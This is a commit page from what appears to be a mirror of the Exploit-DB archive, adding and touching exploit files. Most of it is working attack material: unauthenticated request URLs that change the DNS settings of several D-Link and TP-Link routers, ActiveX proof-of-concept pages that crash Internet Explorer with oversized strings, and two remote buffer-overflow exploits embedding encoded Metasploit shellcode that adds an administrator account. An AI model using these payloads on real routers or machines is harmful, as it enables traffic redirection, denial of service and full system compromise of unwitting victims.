bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-06-09

Browse source 
4 new exploits
This commit is contained in:
root 2015-06-09 06:38:42 +00:00
parent 6a755b7b3d
commit 82307c8cbc
14 changed files with 1158 additions and 1022 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1520
files.csv
View file

File diff suppressed because it is too large Load diff

31
platforms/hardware/webapps/37237.txt Executable file
View file

@ -0,0 +1,31 @@
D-Link DSL-2780B DLink_1.01.14
Unauthenticated Remote DNS Change
Copyright 2015 (c) Todor Donev
<todor.donev at gmail.com>
http://www.ethical-hacker.org/
https://www.facebook.com/ethicalhackerorg
No description for morons,
script kiddies & noobs !!
Disclaimer:
This or previous programs is for Educational
purpose ONLY. Do not use it without permission.
The usual disclaimer applies, especially the
fact that Todor Donev is not liable for any
damages caused by direct or indirect use of the
information or functionality provided by these
programs. The author or any Internet provider
bears NO responsibility for content or misuse
of these programs or any derivatives thereof.
By using these programs you accept the fact
that any damage (dataloss, system crash,
system compromise, etc.) caused by the use
of these programs is not Todor Donev's
responsibility.
Use them at your own risk!
[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsSecondary=8.8.4.4&dnsIfcsList=&dnsRefresh=1" 0&> /dev/null <&1

31
platforms/hardware/webapps/37238.txt Executable file
View file

@ -0,0 +1,31 @@
TP-Link ADSL2+ TD-W8950ND
Unauthenticated Remote DNS Change
Copyright 2015 (c) Todor Donev
<todor.donev at gmail.com>
http://www.ethical-hacker.org/
https://www.facebook.com/ethicalhackerorg
No description for morons,
script kiddies & noobs !!
Disclaimer:
This or previous programs is for Educational
purpose ONLY. Do not use it without permission.
The usual disclaimer applies, especially the
fact that Todor Donev is not liable for any
damages caused by direct or indirect use of the
information or functionality provided by these
programs. The author or any Internet provider
bears NO responsibility for content or misuse
of these programs or any derivatives thereof.
By using these programs you accept the fact
that any damage (dataloss, system crash,
system compromise, etc.) caused by the use
of these programs is not Todor Donev's
responsibility.
Use them at your own risk!
[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1

39
platforms/hardware/webapps/37240.txt Executable file
View file

@ -0,0 +1,39 @@
D-Link DSL-2730B AU_2.01
Authentication Bypass DNS Change
Copyright 2015 (c) Todor Donev
<todor.donev at gmail.com>
http://www.ethical-hacker.org/
https://www.facebook.com/ethicalhackerorg
Disclaimer:
This or previous programs is for Educational
purpose ONLY. Do not use it without permission.
The usual disclaimer applies, especially the
fact that Todor Donev is not liable for any
damages caused by direct or indirect use of the
information or functionality provided by these
programs. The author or any Internet provider
bears NO responsibility for content or misuse
of these programs or any derivatives thereof.
By using these programs you accept the fact
that any damage (dataloss, system crash,
system compromise, etc.) caused by the use
of these programs is not Todor Donev's
responsibility.
Use them at your own risk!
This security hole allows an attacker to bypass
authentication and change the DNS. When the
administrator is logged in the web management
interface, an attacker may be able to completely
bypass authentication phase and connect to the
web management interface with administrator's
credentials. This attack can also be performed
by an external attacker who connects to the
router's public IP address, if remote management
is enabled. To change the DNS without logging
into web management interface use the following URL:
http://TARGET/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=

31
platforms/hardware/webapps/37241.txt Executable file
View file

@ -0,0 +1,31 @@
D-Link DSL-526B ADSL2+ AU_2.01
Unauthenticated Remote DNS Change
Copyright 2015 (c) Todor Donev
<todor.donev at gmail.com>
http://www.ethical-hacker.org/
https://www.facebook.com/ethicalhackerorg
No description for morons,
script kiddies & noobs !!
Disclaimer:
This or previous programs is for Educational
purpose ONLY. Do not use it without permission.
The usual disclaimer applies, especially the
fact that Todor Donev is not liable for any
damages caused by direct or indirect use of the
information or functionality provided by these
programs. The author or any Internet provider
bears NO responsibility for content or misuse
of these programs or any derivatives thereof.
By using these programs you accept the fact
that any damage (dataloss, system crash,
system compromise, etc.) caused by the use
of these programs is not Todor Donev's
responsibility.
Use them at your own risk!
[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1" | grep "var dns2"
var dns2 = '8.8.8.8';

6
platforms/linux/local/40.pl
View file

@ -42,6 +42,6 @@ $buffer2 .= $newret;
exec("mail -s wow -c $buffer2 root@localhost"); exec("mail -s wow -c $buffer2 root@localhost");
#EOF #EOF
# milw0rm.com [2003-06-10] # milw0rm.com [2003-06-10]

6
platforms/linux/remote/38.pl
View file

@ -212,6 +212,6 @@ sub mychomp {
$data = substr($arg, 0, length($arg) - $CRLF); $data = substr($arg, 0, length($arg) - $CRLF);
return $data; return $data;
} }
# milw0rm.com [2003-06-08] # milw0rm.com [2003-06-08]

100
platforms/windows/dos/3030.html
View file

@ -1,50 +1,50 @@
<pre> <pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">----------------------------------------------------------------------------- <code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
RealPlayer 10.5 ierpplug.dll multiple methods Denial of Service RealPlayer 10.5 ierpplug.dll multiple methods Denial of Service
author: shinnai author: shinnai
mail: shinnai[at]autistici[dot]org mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
----------------------------------------------------------------------------- -----------------------------------------------------------------------------
<object classid='clsid:FDC7A535-4070-4B92-A0EA-D9994BCC0DC5' id='RealPlayer'></object> <object classid='clsid:FDC7A535-4070-4B92-A0EA-D9994BCC0DC5' id='RealPlayer'></object>
<select style="width: 404px" name="Pucca"> <select style="width: 404px" name="Pucca">
<option value = "GetComponentVersion">GetComponentVersion</option> <option value = "GetComponentVersion">GetComponentVersion</option>
<option value = "HandleAction">HandleAction</option> <option value = "HandleAction">HandleAction</option>
<option value = "DoAutoUpdateRequest">DoAutoUpdateRequest</option> <option value = "DoAutoUpdateRequest">DoAutoUpdateRequest</option>
<option value = "Quoting">Quoting...</option> <option value = "Quoting">Quoting...</option>
</select> </select>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test"> <input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language='vbscript'> <script language='vbscript'>
Sub tryMe Sub tryMe
on error resume next on error resume next
if Pucca.value="GetComponentVersion" then if Pucca.value="GetComponentVersion" then
argCount = 1 argCount = 1
arg1=String(1000000, "A") arg1=String(1000000, "A")
RealPlayer.GetComponentVersion arg1 RealPlayer.GetComponentVersion arg1
elseif Pucca.value="HandleAction" then elseif Pucca.value="HandleAction" then
argCount = 1 argCount = 1
arg1=String(1000000, "A") arg1=String(1000000, "A")
RealPlayer.HandleAction arg1 RealPlayer.HandleAction arg1
elseif Pucca.value = "DoAutoUpdateRequest" then elseif Pucca.value = "DoAutoUpdateRequest" then
argCount = 3 argCount = 3
arg1=1 arg1=1
arg2=String(1000000, "A") arg2=String(1000000, "A")
arg3=1 arg3=1
RealPlayer.DoAutoUpdateRequest arg1 ,arg2 ,arg3 RealPlayer.DoAutoUpdateRequest arg1 ,arg2 ,arg3
else else
MsgBox "And the beast shall come forth surrounded by a roiling cloud of vengeance." & vbCrLf & _ MsgBox "And the beast shall come forth surrounded by a roiling cloud of vengeance." & vbCrLf & _
"The house of the unbelievers shall be razed and they shall be scorched to the earth." & vbCrLf &_ "The house of the unbelievers shall be razed and they shall be scorched to the earth." & vbCrLf &_
"Their tags shall blink until the end of days." "Their tags shall blink until the end of days."
end if end if
End Sub End Sub
</script> </script>
</span></span> </span></span>
</code></pre> </code></pre>
# milw0rm.com [2006-12-28] # milw0rm.com [2006-12-28]

46
platforms/windows/dos/3041.html
View file

@ -1,23 +1,23 @@
<!-- <!--
-------------------------------------------------------------------------- --------------------------------------------------------------------------
Macromedia Flash 8 (Flash8b.ocx) Internet Explorer Denial of Service Macromedia Flash 8 (Flash8b.ocx) Internet Explorer Denial of Service
author: shinnai author: shinnai
mail: shinnai[at]autistici[dot]org mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
--------------------------------------------------------------------------- ---------------------------------------------------------------------------
--> -->
<html> <html>
<object classid='clsid:D27CDB6E-AE6D-11CF-96B8-444553540000' id='Flash8b'></object> <object classid='clsid:D27CDB6E-AE6D-11CF-96B8-444553540000' id='Flash8b'></object>
<script language='vbscript'> <script language='vbscript'>
argCount = 1 argCount = 1
arg1=String(1000000, "A") arg1=String(1000000, "A")
Flash8b.AllowScriptAccess=arg1 Flash8b.AllowScriptAccess=arg1
</script> </script>
# milw0rm.com [2006-12-29] # milw0rm.com [2006-12-29]

46
platforms/windows/dos/3042.html
View file

@ -1,23 +1,23 @@
<!-- <!--
--------------------------------------------------------------------------- ---------------------------------------------------------------------------
Macromedia Shockwave 10 (SwDir.dll) Internet Explorer Denial of Service Macromedia Shockwave 10 (SwDir.dll) Internet Explorer Denial of Service
author: shinnai author: shinnai
mail: shinnai[at]autistici[dot]org mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
--------------------------------------------------------------------------- ---------------------------------------------------------------------------
--> -->
<html> <html>
<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='ShockW'></object> <object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='ShockW'></object>
<script language='vbscript'> <script language='vbscript'>
argCount = 1 argCount = 1
arg1=String(1000000, "A") arg1=String(1000000, "A")
ShockW.swURL = arg1 ShockW.swURL = arg1
</script> </script>
# milw0rm.com [2006-12-29] # milw0rm.com [2006-12-29]

50
platforms/windows/dos/3155.html
View file

@ -1,25 +1,25 @@
<!-- <!--
----------------------------------------------------------------------------------------------------------- -----------------------------------------------------------------------------------------------------------
BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service
author: shinnai author: shinnai
mail: shinnai[at]autistici[dot]org mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
----------------------------------------------------------------------------------------------------------- -----------------------------------------------------------------------------------------------------------
--> -->
<html> <html>
<object classid='clsid:19E6E148-BAEC-11D2-B03A-EAFC20524153' id='CCRP_BDc'></object> <object classid='clsid:19E6E148-BAEC-11D2-B03A-EAFC20524153' id='CCRP_BDc'></object>
<script language='vbscript'> <script language='vbscript'>
argCount = 1 argCount = 1
arg1=String(2000000, "A") arg1=String(2000000, "A")
CCRP_BDc.SelectedFolder = arg1 CCRP_BDc.SelectedFolder = arg1
</script> </script>
<script language='javascript'> <script language='javascript'>
document.location.reload() document.location.reload()
</script> </script>
# milw0rm.com [2007-01-18] # milw0rm.com [2007-01-18]

124
platforms/windows/dos/3421.html
View file

@ -1,62 +1,62 @@
<pre> <pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">----------------------------------------------------------------------------- <code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
Macromedia SwDir.dll ver. 10.1.4.20 multiple methods Stack Overflow Macromedia SwDir.dll ver. 10.1.4.20 multiple methods Stack Overflow
author: shinnai author: shinnai
mail: shinnai[at]autistici[dot]org mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
----------------------------------------------------------------------------- -----------------------------------------------------------------------------
<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='Shockwave' style="WIDTH: 0px; HEIGHT: 0px" ></object> <object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='Shockwave' style="WIDTH: 0px; HEIGHT: 0px" ></object>
<select style="width: 404px" name="Pucca"> <select style="width: 404px" name="Pucca">
<option value = "BGCOLOR">BGCOLOR</option> <option value = "BGCOLOR">BGCOLOR</option>
<option value = "SRC">SRC</option> <option value = "SRC">SRC</option>
<option value = "AutoStart">AutoStart</option> <option value = "AutoStart">AutoStart</option>
<option value = "Sound">Sound</option> <option value = "Sound">Sound</option>
<option value = "DrawLogo">DrawLogo</option> <option value = "DrawLogo">DrawLogo</option>
<option value = "DrawProgress">DrawProgress</option> <option value = "DrawProgress">DrawProgress</option>
<option value = "Quoting">Quoting...</option> <option value = "Quoting">Quoting...</option>
</select> </select>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test"> <input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language='vbscript'> <script language='vbscript'>
Sub tryMe Sub tryMe
on error resume next on error resume next
if Pucca.value="BGCOLOR" then if Pucca.value="BGCOLOR" then
argCount = 1 argCount = 1
arg1=String(1000000, "A") arg1=String(1000000, "A")
Shockwave.BGCOLOR = arg1 Shockwave.BGCOLOR = arg1
elseif Pucca.value="SRC" then elseif Pucca.value="SRC" then
argCount = 1 argCount = 1
arg1=String(1000000, "A") arg1=String(1000000, "A")
Shockwave.SRC = arg1 Shockwave.SRC = arg1
elseif Pucca.value = "AutoStart" then elseif Pucca.value = "AutoStart" then
argCount = 1 argCount = 1
arg1=String(1000000, "A") arg1=String(1000000, "A")
Shockwave.AutoStart = arg1 Shockwave.AutoStart = arg1
elseif Pucca.value = "Sound" then elseif Pucca.value = "Sound" then
argCount = 1 argCount = 1
arg1=String(1000000, "A") arg1=String(1000000, "A")
Shockwave.Sound = arg1 Shockwave.Sound = arg1
elseif Pucca.value = "DrawLogo" then elseif Pucca.value = "DrawLogo" then
argCount = 1 argCount = 1
arg1=String(1000000, "A") arg1=String(1000000, "A")
Shockwave.DrawLogo = arg1 Shockwave.DrawLogo = arg1
elseif Pucca.value = "DrawProgress" then elseif Pucca.value = "DrawProgress" then
argCount = 1 argCount = 1
arg1=String(1000000, "A") arg1=String(1000000, "A")
Shockwave.DrawProgress = arg1 Shockwave.DrawProgress = arg1
else else
MsgBox "Hence to fight and conquer in all your battles is not supreme excellence;" & vbCrLf & _ MsgBox "Hence to fight and conquer in all your battles is not supreme excellence;" & vbCrLf & _
"supreme excellence consists in breaking the enemy's resistance without fighting." "supreme excellence consists in breaking the enemy's resistance without fighting."
end if end if
End Sub End Sub
</script> </script>
</span></span> </span></span>
</code></pre> </code></pre>
# milw0rm.com [2007-03-07] # milw0rm.com [2007-03-07]

102
platforms/windows/remote/3993.html
View file

@ -1,51 +1,51 @@
<!-- <!--
IE 6 / Ademco, co., ltd. ATNBaseLoader100 Module ATNBaseLoader100.dll (5, 4, 0, 6) IE 6 / Ademco, co., ltd. ATNBaseLoader100 Module ATNBaseLoader100.dll (5, 4, 0, 6)
remote buffer overflow exploit / XP SP2 it version remote buffer overflow exploit / XP SP2 it version
by rgod by rgod
site: retrogod.altervista.org site: retrogod.altervista.org
this activex is installed browsing some webcam pages this activex is installed browsing some webcam pages
try this google dork: try this google dork:
intitle:"Browser Launch Page" intitle:"Browser Launch Page"
(dork credit: dragg, found in GHDB) (dork credit: dragg, found in GHDB)
object safety report: object safety report:
RegKey Safe for Script: True RegKey Safe for Script: True
RegkeySafe for Init: True RegkeySafe for Init: True
KillBitSet: False KillBitSet: False
here it is what happen, EIP is overwritten after 272 chars passed to here it is what happen, EIP is overwritten after 272 chars passed to
Send485CMD method: Send485CMD method:
EAX 00000001 EAX 00000001
ECX 0013EA7C ASCII "AAAA ... ECX 0013EA7C ASCII "AAAA ...
EDX 7EFF00E4 EDX 7EFF00E4
EBX 10007414 EBX 10007414
ESP 0013EB98 ASCII "AAAA ... ESP 0013EB98 ASCII "AAAA ...
EBP 41414141 EBP 41414141
ESI 0018022C ESI 0018022C
EDI 00000000 EDI 00000000
EIP 41414141 EIP 41414141
SetLoginID, AddSite, SetScreen, SetVideoServer methods are also vulnerable SetLoginID, AddSite, SetScreen, SetVideoServer methods are also vulnerable
to less convenient overflows or seh overwrite to less convenient overflows or seh overwrite
--> -->
<HTML> <HTML>
<OBJECT CLASSID='clsid:4C1AB3D8-8107-4BC8-AEEE-38ECF8A94A12' ID='BaseRunner' ></OBJECT> <OBJECT CLASSID='clsid:4C1AB3D8-8107-4BC8-AEEE-38ECF8A94A12' ID='BaseRunner' ></OBJECT>
<script language='vbscript'> <script language='vbscript'>
'metasploit one, 456 bytes - cmd /c net user su tzu /add & net localgroup Administrators su /add 'metasploit one, 456 bytes - cmd /c net user su tzu /add & net localgroup Administrators su /add
SCODE = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44") + NOP SCODE = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44") + NOP
NOP= String(12, unescape("%90")) NOP= String(12, unescape("%90"))
EIP= unescape("%03%78%41%7e") 'call ESP user32.dll EIP= unescape("%03%78%41%7e") 'call ESP user32.dll
SunTzu=String(272, "A") + EIP + NOP + SCODE SunTzu=String(272, "A") + EIP + NOP + SCODE
BaseRunner.Send485CMD SunTzu BaseRunner.Send485CMD SunTzu
</script> </script>
</HTML> </HTML>
# milw0rm.com [2007-05-26] # milw0rm.com [2007-05-26]

48
platforms/windows/remote/4023.html
View file

@ -1,24 +1,24 @@
<!-- IE6 / Provideo Camimage class (ISSCamControl.dll 1.0.1.5) <!-- IE6 / Provideo Camimage class (ISSCamControl.dll 1.0.1.5)
remote seh overwrite exploit / win2k sp4 remote seh overwrite exploit / win2k sp4
tried the SD-222VPRO camera series,you can reach an online demo here: tried the SD-222VPRO camera series,you can reach an online demo here:
http://www.provideo.com.tw/security%20live%20demo.htm http://www.provideo.com.tw/security%20live%20demo.htm
rgod rgod
--> -->
<HTML> <HTML>
<object classid='clsid:AA0FB75C-C50E-47B6-B7E0-3B9C3FAA8AC4' id='Camimage' /></object> <object classid='clsid:AA0FB75C-C50E-47B6-B7E0-3B9C3FAA8AC4' id='Camimage' /></object>
<script language='vbscript'> <script language='vbscript'>
REM metasploit one, add a user 'su' with pass 'tzu' REM metasploit one, add a user 'su' with pass 'tzu'
shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44") + NOP shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44") + NOP
seh_handler = unescape("%1e%16%e6%77") : REM 0x77e6161e call edi user32.dll seh_handler = unescape("%1e%16%e6%77") : REM 0x77e6161e call edi user32.dll
nop = string(96,unescape("%90")) nop = string(96,unescape("%90"))
suntzu = "http://www." + String(97,"a") + seh_handler + nop + shellcode + nop + ".com" suntzu = "http://www." + String(97,"a") + seh_handler + nop + shellcode + nop + ".com"
Camimage.URL = suntzu Camimage.URL = suntzu
</script> </script>
</HTML> </HTML>
# milw0rm.com [2007-06-02] # milw0rm.com [2007-06-02]